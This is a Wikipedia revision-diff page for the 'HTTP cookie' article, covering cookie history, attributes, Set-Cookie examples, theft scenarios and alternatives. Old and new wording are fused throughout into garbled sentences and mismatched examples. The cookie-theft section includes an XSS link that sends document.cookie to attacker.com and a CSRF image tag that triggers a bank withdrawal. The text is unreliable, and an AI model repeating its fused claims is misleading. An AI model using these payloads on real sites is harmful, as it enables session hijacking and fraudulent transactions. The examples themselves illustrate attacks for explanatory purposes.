HTTP cookie: Difference between revisions

Magic cookies were already used in computing when computer programmer [[Lou Montulli]] had the idea of using them in web communications in June 1994.<ref name="N4WV7">{{cite news |url=httphttps://www.nytimes.com/2001/09/04/technology/04COOK.html |work=The New York Times |first=John |last=Schwartz |title=Giving Web a Memory Cost Its Users Privacy |date=2001-09-04 |access-date=2017-02-19 |archive-url=https://web.archive.org/web/20111118090113/http://www.nytimes.com/2001/09/04/technology/04COOK.html |archive-date=2011-11-18 |url-status=live}}</ref> At the time, he was an employee of [[Netscape Communications]], which was developing an [[e-commerce]] application for [[MCI Inc.|MCI]]. [[Vint Cerf]] and [[John Klensin]] represented MCI in technical discussions with Netscape Communications. NotMCI wantingdid thenot MCIwant its servers to have to retain partial transaction states, which led them to MCI's request toask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a [[Shopping cart software|virtual shopping cart]].<ref name="kskesan">{{cite journal|last1=Kesan, |first1=Jey; and |last2=Shah, |first2=Rajiv ; [http://papers.|ssrn.com/sol3/papers.cfm?abstract_id=597543 ''|title=Deconstructing Code''], SSRN.com, chapter II.B (Netscape's cookies),|date=2018-08-19 |journal=Yale Journal of Law and Technology, |volume=6, |pages=277–389}}</ref><ref name="kristol">{{cite journal | last=Kristol, | first=David; ''M. | title=HTTP Cookies: Standards, privacyPrivacy, and politics'',Politics | journal=ACM Transactions on Internet Technology, 1| publisher=Association for Computing Machinery (2ACM), 151–198,| volume=1 | issue=2 | year=2001 {{doi| issn=1533-5399 | doi=10.1145/502152.502153}} (an| expandedpages=151–198 version is freely available at [http://|arxiv.org/abs/=cs.SE/0105018 arXiv:cs/0105018v1 [cs.SE&#93;])|s2cid=1848140}}</ref>

Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of [[Netscape Navigator|Mosaic Netscape]], released on October 13, 1994,<ref name="JgNeY">{{cite web |url=http://wp.netscape.com/newsref/pr/newsrelease1.html |title=Press Release: Netscape Communications Offers New Network Navigator Free On The Internet |publisher=Web.archive.org |accessdateaccess-date=2010-05-22 |archiveurlarchive-url = https://web.archive.org/web/20061207145832/http://wp.netscape.com/newsref/pr/newsrelease1.html |archivedatearchive-date=2006-12-07 }}</ref><ref name="8YpTv">{{cite web |url=httphttps://groups.google.com/group/comp.infosystems.www.users/msg/9a210e5f72278328 |title=Usenet Post by Marc Andreessen: Here it is, world! |publisher=Groups.google.com |date=1994-10-13 |accessdateaccess-date=2010-05-22 |archive-url=https://web.archive.org/web/20110427123350/http://groups.google.com/group/comp.infosystems.www.users/msg/9a210e5f72278328 |archive-date=2011-04-27 |url-status=live}}</ref> supported cookies{{citation.<ref needed|datename=May"kristol" 2015}}./> The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, andwhich was granted in 1998.<ref>{{Cite patent|country=US|number=5774670}}|pubdate=1998-06-30|title=Persistent wasclient grantedstate in 1998a hypertext transfer protocol based client-server system|assign1=[[Netscape Communications Corp.]]|inventor1-last=Montulli|inventor1-first=Lou}}</ref> Support for cookies was integrated inwith [[Internet Explorer]] in version 2, released in October 1995.<ref name="95BiI">{{cite news |first=Sandi |last=Hardmeier |url=httphttps://www.microsoft.com/windows/IE/community/columns/historyofie.mspx |title=The history of Internet Explorer |publisher=Microsoft |date=2005-08-25 |accessdateaccess-date=2009-01-04 |archive-url=https://web.archive.org/web/20051001113951/http://www.microsoft.com/windows/IE/community/columns/historyofie.mspx |archive-date=2005-10-01 |url-status=live}}</ref>

The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence.<ref>{{Cite Thejournal general|last=Miyazaki |first=Anthony D. |date=2008 |title=Online Privacy and the Disclosure of Cookie Use: Effects on Consumer Trust and Anticipated Patronage |url=http://journals.sagepub.com/doi/10.1509/jppm.27.1.19 |journal=Journal of Public Policy & Marketing |language=en |volume=27 |issue=1 |pages=19–33 |doi=10.1509/jppm.27.1.19 |issn=0743-9156|url-access=subscription }}</ref> The public learned about cookies after the ''[[Financial Times]]'' published an article about them on February 12, 1996.<ref name="B3JMd">{{cite news|last=Jackson|first=T|title=This Bug in Your PC is a Smart Cookie|newspaper=Financial Times|date=1996-02-12}}</ref> In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two [[U.S.]] [[Federal Trade Commission]] hearings in 1996 and 1997.<ref name="UjTred" />

The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk [[Electronicelectronic mailing list|mailing list]]. A special working group within the [[Internet Engineering Task Force|IETF]] (IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by [[Brian Behlendorf]] and David Kristol respectively,. butBut the group, headed by Kristol himself and AronLou AfatsuomMontulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.<ref name="RFC2109">{{Cite ietf|rfc=2109 |section=8.3 }}</ref> At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.

{{RefimproveMore citations needed section|date=August 2011}}

A ''session cookie,'' (also known as an ''in-memory cookie'', ''transient cookie'' or transient''non-persistent cookie,'') exists only in temporary memory while the user navigates thea website.<ref name="mscookie">Microsoft{{cite Supportweb [http://support.microsoft.com/kb/223799/EN-US| title=Description of Persistent and Per-Session Cookies in Internet Explorer] Article| IDwebsite=support.microsoft.com 223799,| date=2007-01-24 | url=http://support.microsoft.com/kb/223799/EN-US | archive-url=https://web.archive.org/web/20110925230707/http://support.microsoft.com/kb/223799/EN-US | archive-date=2011-09-25 | url-status=dead}}</ref>

WebSession browserscookies normallyexpire deleteor sessionare cookiesdeleted when the user closes the web browser.<ref name="HwxT6">{{cite web |url= http://msdn.microsoft.com/en-us/library/ms526029(v=vs.90).aspx |title=Maintaining session state with cookies |work=Microsoft Developer Network |accessdateaccess-date=22 October 2012 |archive-url=https://web.archive.org/web/20121014110456/http://msdn.microsoft.com/en-us/library/ms526029(v=vs.90).aspx |archive-date=14 October 2012 |url-status=live}}</ref> Unlike otherSession cookies, sessionare cookiesidentified doby notthe havebrowser by the absence of an expiration date assigned to them, which is how the browser knows to treat them as session cookies.

Instead of expiring when the web browser is closed as session cookies do,A ''persistent cookiescookie'' expireexpires at a specific date or after a specific length of time. For Thisthe means that, for thepersistent cookie's entire lifespan (whichset can be as long or as short asby its creators want)creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).

For this reason, persistent cookies are sometimes referred to as '''tracking cookies'''<ref>{{Cite journal |last1=Bujlow |first1=Tomasz |last2=Carela-Espanol |first2=Valentin |last3=Lee |first3=Beom-Ryeol |last4=Barlet-Ros |first4=Pere |date=2017 |title=A Survey on Web Tracking: Mechanisms, Implications, and Defenses |journal=Proceedings of the IEEE |volume=105 |issue=8 |pages=1476–1510 |doi=10.1109/JPROC.2016.2637878 |issn=0018-9219|hdl=2117/108437 |hdl-access=free }}</ref><ref>{{Citation |last1=Rasaii |first1=Ali |title=Exploring the Cookieverse: A Multi-Perspective Analysis of Web Cookies |date=2023 |work=Passive and Active Measurement |volume=13882 |pages=623–651 |editor-last=Brunstrom |editor-first=Anna |url=https://link.springer.com/10.1007/978-3-031-28486-1_26 |access-date=2024-08-24 |place=Cham |publisher=Springer Nature Switzerland |language=en |doi=10.1007/978-3-031-28486-1_26 |isbn=978-3-031-28485-4 |last2=Singh |first2=Shivani |last3=Gosain |first3=Devashish |last4=Gasser |first4=Oliver |editor2-last=Flores |editor2-first=Marcel |editor3-last=Fiore |editor3-first=Marco|url-access=subscription }}</ref> because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. Persistent However, theycookies are also used for "legitimate" reasons as well (such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit). {{Crossreference|selfref=no|(See {{section link||Uses}}, below.)}}

A ''secure cookie'' can only be transmitted over an encrypted connection (i.e. [[HTTP Secure|HTTPS]]). They cannot be transmitted over unencrypted connections (i.e. [[HTTP]]). This makes the cookie less likely to be exposed to cookie theft via [[Network eavesdropping|eavesdropping]]. A cookie is made secure by adding the <code>Secure</code> flag to the cookie.

===Third{{anchor|HttpOnly cookie}}Http-partyonly cookie===

{{mainMain|Zombie cookie|Evercookie}}

A cookie consists of the following components:<ref name="Peng, Weihong 2000">{{cite webjournal|title=HTTP cookiesCookies, -A aPromising promising technologyTechnology|urljournal=http://search.proquest.com/docview/194487945?accountid=14541|work=ProquestProQuest|publisher=Online Information Review|accessdatelast1=29 March 2013Peng|authorfirst1=Peng, Weihong|author2last2=Cisna, |first2=Jennifer|year=2000|id={{ProQuest|194487945}}}}</ref><ref name="Stenberg, Daniel 2009">Jim Manico quoting Daniel Stenberg, [http://manicode.blogspot.it/2009/08/real-world-cookie-length-limits.html Real world cookie length limits] {{Webarchive|url=https://web.archive.org/web/20130702114435/http://manicode.blogspot.it/2009/08/real-world-cookie-length-limits.html |date=2013-07-02}}</ref><ref>{{Cite journal |last1=Lee |first1=Wei-Bin |last2=Chen |first2=Hsing-Bai |last3=Chang |first3=Shun-Shyan |last4=Chen |first4=Tzung-Her |date=2019-01-25 |title=Secure and efficient protection for HTTP cookies with self-verification |url=https://onlinelibrary.wiley.com/doi/10.1002/dac.3857 |journal=International Journal of Communication Systems |language=en |volume=32 |issue=2 |pages=e3857 |doi=10.1002/dac.3857|s2cid=59524143 |url-access=subscription }}</ref>

Because session cookies only contain a unique session identifier, this makes the amount of personal information that a website can save about each user virtually limitless—the website is not limited to restrictions concerning how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.

Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.

Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the [[Google]] search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wantwanted to see.

# From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server not only sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.

[[File:HTTP cookie exchange.svg|thumb|A possible interaction between a web browser and a web server holding a web page in which the server sends a cookie to the browser and the browser sends it back when requesting another page.]]

Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing [[state (computer science)|statestates]] (memory of previous events) into otherwise stateless [[HTTP]] transactions. Without cookies, each retrieval of a [[web page]] or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as [[JavaScript]] (providedunless the cookie's <code>HttpOnly</code> flag is not set, in which case the cookie cannot be modified by scripting languages).

The cookie specifications<ref name="httponlyrfc">IETF{{cite [//tools.ietf.org/html/rfc6265 |rfc=6265 |title=HTTP State Management Mechanism – Apr, 2011] Obsoletes RFC 2965}}</ref><ref name="NWRaX">{{cite web |title=Persistent client state HTTP cookies: Preliminary specification |url=http://wp.netscape.com/newsref/std/cookie_spec.html |archiveurlarchive-url=https://web.archive.org/web/20070805052634/http://wp.netscape.com/newsref/std/cookie_spec.html |publisher=Netscape |archivedatearchive-date=2007-08-05 |date=c. 1999 }}</ref><ref>RFC 2965 – HTTP State Management Mechanism ([[Internet Engineering Task Force|IETF]])</ref> require that browsers must meet the following requirements in order to support cookies:

* Can support cookiesat asleast large50 ascookies 4,096per [[byteInternet ___domain|___domain]]s in(i.e. per sizewebsite).

* Can storesupport at least 503,000 cookies perin [[Internet ___domain|___domain]] (itotal.e. per website)

Cookies are set using the [[HTTP]] <code>Set-Cookie</code> [[HTTP header|header field]], sent in an HTTP response. from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will, of course, ignore this header field if it does not support cookies or has disabled cookies).

</syntaxhighlight >

</syntaxhighlight >

This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, and possibly addingincluding othermore <code>Set-Cookie</code> header fields in the HTTP response in order to instruct the browser to add new cookies, asmodify wellexisting usingcookies, or remove existing cookies. To remove a cookie, the server must include a <code>Set-Cookie</code> header field with an expiration date in the past.

In addition to a name and value, cookies can also have one or more attributes. Browsers do not sendinclude cookie attributes backin requests to the server. Theyserver—they only send the cookie’scookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie to the server.

The <code>Domain</code> and <code>Path</code> attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For obvious security reasons, cookies can only be set on the current resource's top ___domain and its sub domainssubdomains, and not for another ___domain and its sub domainssubdomains. For example, the website <code>example.org</code> cannot set a cookie that has a ___domain of <code>foo.com</code> because this would allow the website <code>example.org</code> website to control the cookies of the ___domain <code>foo.com</code>.

If a cookie's ___domain<code>Domain</code> and path<code>Path</code> attributes are not specified by the server, they default to the ___domain and path of the resource that was requested.<ref name="uMnRY">{{cite webietf |urlrfc=http://tools.ietf.org/html/rfc6265#6265 |section-=4.1.2.4 |work=IETF |title=HTTP State Management Mechanism –, The Path Attribute |datelast1=MarchBarth 2014|first1=A. }}</ref> However, in most browsers there is a difference between a cookie set from <code>foo.com</code> without a ___domain, and a cookie set with the <code>foo.com</code> ___domain. In the former case, the cookie will only be sent for requests to <code>foo.com</code>, also known as a host-only cookie. In the latter case, all sub domainssubdomains are also included (for example, <code>docs.foo.com</code>).<ref name="iDIGa">{{cite webietf |urlrfc=http://tools.ietf.org/html/rfc6265#6265 |section-=5.1.3 |work=IETF |title=RFC 6265 -, HTTP State Management Mechanism –, Domain matching |date=March 2014 |last1=Barth |first1=A. }}</ref><ref name="5Qixt">{{cite webietf |urlrfc=http://tools.ietf.org/html/rfc6265#6265 |section-=4.1.2.3 |work=IETF |title=RFC 6265 -, HTTP State Management Mechanism –, The Domain Attribute |date=March 2014 |last1=Barth |first1=A. }}</ref> A notable exception to this general rule is Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always sends cookies to subdomains regardless of whether the cookie was set with or without a ___domain.<ref name="Ry6VV">{{cite web |url=https://blogs.msdn.microsoft.com/b/ieinternals/archive/2009/08/20/wininet-ie-cookie-internals-faq.aspx |title=Internet Explorer Cookie Internals (FAQ) | date=21 November 2018}}</ref>

Below is an example of some <code>Set-Cookie</code> HTTPheader responsefields headersin thatthe areHTTP sentresponse fromof a website after a user logged in. The HTTP request was sent to a webpage within the <code>docs.foo.com</code> subdomain:

Set-Cookie: HSID=AYQEVn….DKrdstAYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly

Set-Cookie: SSID=Ap4P….GTEqAp4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly

The first cookie, <code>LSID</code>, has no <code>Domain</code> attribute, and has a <code>Path</code> attribute set to <code>/accounts</code>,. whichThis tells the browser to use the cookie only when requesting pages contained in <code>docs.foo.com/accounts</code> (the ___domain is derived from the request ___domain). The other two cookies, <code>HSID</code> and <code>SSID</code>, would be used when the browser requests any subdomain in <code>.foo.com</code> on any path (for example <code>www.foo.com/bar</code>). The prepending dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.<ref name="gxcF2">{{cite webietf |urlrfc=http://tools.ietf.org/html/rfc2109#2109 |section-=4.2.2 |work=IETF |title=RFC 2109 -, HTTP State Management Mechanism –, Set-Cookie syntax |date=March 2014 |last1=Kristol |first1=D. |last2=Montulli |first2=L. |s2cid=6914676 }}</ref>

Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15- Jan- 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly

Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01- Jan- 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly

The first cookie, <code>lu</code>, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie, <code>made_write_conn</code>, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie, <code>reg_fb_gate</code>, has its value changed to "''deleted"'', with an expiration time in the past. The browser will delete this cookie right away. because its expiration time is in the past. Note that cookie will only be deleted if the ___domain and path attributes in the <code>Set-Cookie</code> field match the values used when the cookie was created.

The <code>Secure</code> and <code>HttpOnly</code> attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.

The <code>Secure</code> attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via [[HttpsHTTPS|secure/encrypted]] connections. However, if a web server sets a cookie with a secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user by [[man-in-the-middle attack]]s. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.

The <code>HttpOnly</code> attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. CookiesThis withmeans thisthat attributethe arecookie notcannot accessiblebe accessed via nonclient-HTTPside methods,scripting suchlanguages as calls via(notably [[JavaScript]] (using <code>document.cookie</code>), and therefore cannot be stolen easily via [[cross-site scripting]] (a pervasive attack technique).<ref name="Symantec-2007-2nd-exec">{{cite journalreport |title=Symantec Internet Security Threat Report: Trends for July–December 2007 (Executive Summary) |publisher=Symantec Corp. |volume=XIII |pages=1–3 |date=April 2008 |url=http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf |formataccess-date=PDFMay 11, 2008 |accessdatearchive-url=Mayhttps://web.archive.org/web/20080625065121/http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf 11|archive-date=June 25, 2008 |url-status=dead}}</ref> Facebook and Google use the HttpOnly attribute extensively, among others.

Most modern browsers support cookies and allow the user to disable them. The following are common options:<ref name="eyMbr">{{cite web |first=David |last=Whalen |url=http://www.cookiecentral.com/faq/ |title=The Unofficial Cookie FAQ v2.6 |publisher=Cookie Central |date=June 8, 2002 |accessdateaccess-date=2009-01-04 |archive-url=https://web.archive.org/web/20110824223646/http://www.cookiecentral.com/faq/ |archive-date=August 24, 2011 |url-status=live}}</ref>

{{multipleMultiple issues|section=yes|

{{originalOriginal research|section|date=September 2011}}

{{unreferencedUnreferenced section|date=September 2011}}

Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users’users' requests by stealing a full set of victims’victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim’svictim's requests; thus the request is performed on behalf of the victim’svictim's session.

Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) whichthat work with websites which relyrelying solely on HTTP cookies for user identification.

[[File:Cookie-sniffing.svg|thumb|A cookie can be stolen by another computer that is allowed reading from the network.]]

<sourcesyntaxhighlight lang="html5html">

<a href="#" onclick="window.___location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>

Such attacks can be mitigated by using ''HttpOnly'' cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.

===Cross-site scripting –: proxy request===

In older versions of many browsers, there were security holes allowingin the implementation of the [[XMLHttpRequest]] API. This API allows attackerspages to scriptspecify a proxy requestserver bythat usingwould get the client-sidereply, and this proxy server is not subject to the [[XMLHttpRequestsame-origin policy]] API. For example, a victim is reading an attacker’sattacker's posting on <code>www.example.com</code>, and the attacker’sattacker's script is executed in the victim’svictim's browser. The script generates a request to <code>www.example.com</code> with the proxy server <code>attacker.com</code>. Since the request is for <code>www.example.com</code>, all <code>example.com</code> cookies will be sent along with the request, but routed through the attacker’sattacker's proxy server. Hence, the attacker would be able to harvest the victim’svictim's cookies.

This attack would not work with ''Secure''secure cookies, since they can only be transmitted over [[HTTPS]] connections, and the HTTPS protocol dictates [[end-to-end encryption]] (i.e. the information is encrypted on the user’suser's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.

{{mainMain|Cross-site request forgery}}

<sourcesyntaxhighlight lang="xml"><img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory"></sourcesyntaxhighlight>

Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer ([[Representational State Transfer|REST]]) software architectural style.<ref name="tBPhf">{{cite news |url=http://roy.gbiv.com/pubs/dissertation/evaluation.htm |title=Fielding Dissertation: CHAPTER 6: Experience and Evaluation |first=Roy |last=Fielding |year=2000 |accessdateaccess-date=2010-10-14 |archive-url=https://web.archive.org/web/20110427074406/http://roy.gbiv.com/pubs/dissertation/evaluation.htm |archive-date=2011-04-27 |url-status=live}}</ref><ref name="gdVMy">{{cite web |first=Stefan |last=Tilkov |url=http://www.infoq.com/articles/rest-anti-patterns |title=REST Anti-Patterns |publisher=InfoQ |date=July 2, 2008 |accessdateaccess-date=2009-01-04 |archive-url=https://web.archive.org/web/20081223151145/http://www.infoq.com/articles/rest-anti-patterns |archive-date=December 23, 2008 |url-status=live}}</ref>

If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.<ref name="sD3KB">{{Cite web|last=Hoffman|first=Chris|title=What Is a Browser Cookie?|url=https://www.howtogeek.com/119458/htg-explains-whats-a-browser-cookie/|access-date=2021-04-03|website=How-To Geek|date=28 September 2016 |language=en-US}}</ref>

====URL (query string)====

A more precise technique is based on embedding information into URLs. The [[query string]] part of the [[Uniform Resource Locator|URL]] is the onepart that is typically used for this purpose, but other parts can be used as well. The [[Java Servlet]] and [[PHP]] session mechanisms both use this method if cookies are not enabled.

This method consists of the web server appending query strings to the links ofcontaining a webunique pagesession itidentifier holdsto whenall sendingthe itlinks toinside of a browserweb page. When the user follows a link, the browser returnssends the attached query string to the server, allowing the server to identify the user and maintain state.

QueryThese stringskinds usedof inquery this way and cookiesstrings are very similar, to cookies in that both beingcontain arbitrary pieces of information chosen by the server and both are sent back byto the browserserver on every request. However, there are some differences:. sinceSince a query string is part of a URL, if that URL is later reused, the same attached piece of information iswill be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by [[e-mail]], those preferences will be used for that other user as well.

Moreover, even if the same user accesses the same page twomultiple times from different sources, there is no guarantee that the same query string iswill be used ineach both viewstime. For example, if the samea user arrivesvisits to the samea page butby coming from a page ''internal to the site'' the first time, and then visits the same page by coming from an ''external [[search engine]]'' the second time, the relative query strings arewould typicallylikely be different. whileIf cookies were used in this situation, the cookies would be the same.

Other drawbacks of query strings are related to security:. storingStoring data that identifies a session in a query string enables or simplifies [[session fixation]] attacks, [[HTTP referer|referer]] logging attacks and other [[Exploit (computer security)|security exploits]]. Transferring session identifiers as HTTP cookies is more secure.

====Hidden form fields====

Another form of session tracking is to use [[Formform (web)|web forms]] with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks;. andIn fact, if the form is handled with the [[HTTP]] GET method, thethen fieldsthis actuallytechnique becomeis partsimilar ofto theusing URL query strings, since the browserGET willmethod sendadds uponthe form submissionfields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be appendedsent asin extrathe inputHTTP thatrequest body, which is neither part of the URL, nor of a cookie.

This approach presents two advantages from the point of view of the tracker:. firstFirst, having the tracking information placed in the HTMLHTTP sourcerequest and POST inputbody rather than in the URL means it will not be noticed by the average user;. secondSecond, the session information is not copied when the user copies the URL (to savebookmark the page on disk or send it via email, for example).

====window.name DOM property====

All current web browsers can store a fairly large amount of data (2–32 &nbsp;MB) via JavaScript using the [[Document Object Model|DOM]] property <code>window.name</code>. This data can be used instead of session cookies and is also cross-___domain. The technique can be coupled with [[JSON]]/JavaScript objects to store complex sets of session variables<ref>{{cite web |url=http://www.thomasfrank.se/sessionvars.html |title=ThomasFrank.se |publisher=ThomasFrank.se |accessdate=2010-05-22}}</ref> on the client side.

The downside is that every separate window or [[Tabbed document interface|tab]] will initially have an empty ''<code>window.name''</code> property when opened. Furthermore, ''window.name'' can be used for tracking visitors across different websites, making it of concern for [[Internet privacy]].

In some respects, this can be more secure than cookies due to notthe involvingfact thethat server,its socontents it isare not vulnerableautomatically sent to ''network''the cookieserver sniffingon attacks.every However,request iflike special measurescookies are, not taken to protect the data,so it is not vulnerable to othernetwork attackscookie becausesniffing the data is available across different websites opened in the same window or tabattacks.

===HTTP authenticationTracking===

====ETag====

===CacheWeb storage===

==See also==<!-- PLEASE RESPECT ALPHABETICAL ORDER -->

* [[SessionSecure IDcookie]]

{{reflist|colwidth=35em}}

<!-- Dead note "rfc2": RFC 2109 and RFC 2965 -, HTTP State Management Mechanism ([[Internet Engineering Task Force|IETF]]) -->

{{Spoken Wikipedia|HTTP_cookieHTTP cookie.ogg|2015date=2016-0205-2228}}

{{commonsCommons category|HTTP cookies}}

* RFC{{IETF RFC|6265 –|link=no}}, the current official specification for HTTP cookies

* [https://developer.mozilla.org/en-US/docs/Web_Development/HTTP_cookies HTTP cookies] -, Mozilla Developer Network

* [https://developer.mozilla.org/en-US/docs/DOM/document.cookie Using cookies via ECMAScript] -, Mozilla Developer Network

* [http://bayou.io/draft/cookie.___domain.html Cookie Domain -, explain in detail how cookie domains are handled in current major browsers]

{{Web browsers|fsp}}

[[Category:WebHacking security(computer exploitssecurity)]]

[[Category:Wikipedia articles with ASCII artTracking]]